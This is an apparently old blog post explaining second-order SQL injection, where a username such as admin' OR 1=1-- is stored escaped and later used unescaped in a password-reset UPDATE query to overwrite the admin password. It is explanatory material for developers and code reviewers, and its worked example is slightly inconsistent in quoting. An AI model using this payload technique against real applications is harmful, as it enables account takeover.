Tuesday, December 4, 2012



Second order injections are the ones which are not widely discussed. Firstly these cannot be detected by  tools and one needs to understand the application logic and flow to detect this. A code review is better to understand the injection.
In general the Injections happen when the developer trusts the input/or fails to sanitize input  to build up  the query being used in the application.

What are second order injection?
Second order injections can be considered simmilar to the stored XSS. Injection does not directly yeild result but this injection is used at some other places insecurely causing the injection to trigger and yield results.
As an Example to understand this imagine an application which allows user to create a user account in the system. Now a malicious user can try to inject SQL keywords in the user creation form which is nicely escaping dangerous characters by use of mysql_real_escape_string() and making it safe for that form. Because mysql_real_escape_string() escapes the dangerous chars, therefore if attacker tries to inject admin' OR 1=1--  in the username field, because of the function, the quotes would be escaped and input would become admin\' or 1=1--. If other values of form are valid, the user account is created with the name admin' OR 1=1-- .

Now with the user created, he can login with newly created account and go to the password reset page. As this page is checking for old password , and building up a query behind the scene something like
UPDATE users SET passwd="New_Pass" WHERE username="Username" and passwd="oldpassword"

Now as the username is being taken from the database, the developer treats this as trusted info. As he is confident that initially there is no SQL Injection on the pages. This blind trust on the data from database is called without any escaping, thereby causing the username to trigger the SQL injection.

The query becomes UPDATE users SET passwd="New_Pass" WHERE username ='   admin' --  ' AND password=' old password  '.
Effectively SQLi working and changing the password of Admin user commenting out rest of query which is marked in brown

A video demonstration for the same can be found on the location below.

No comments:

Post a Comment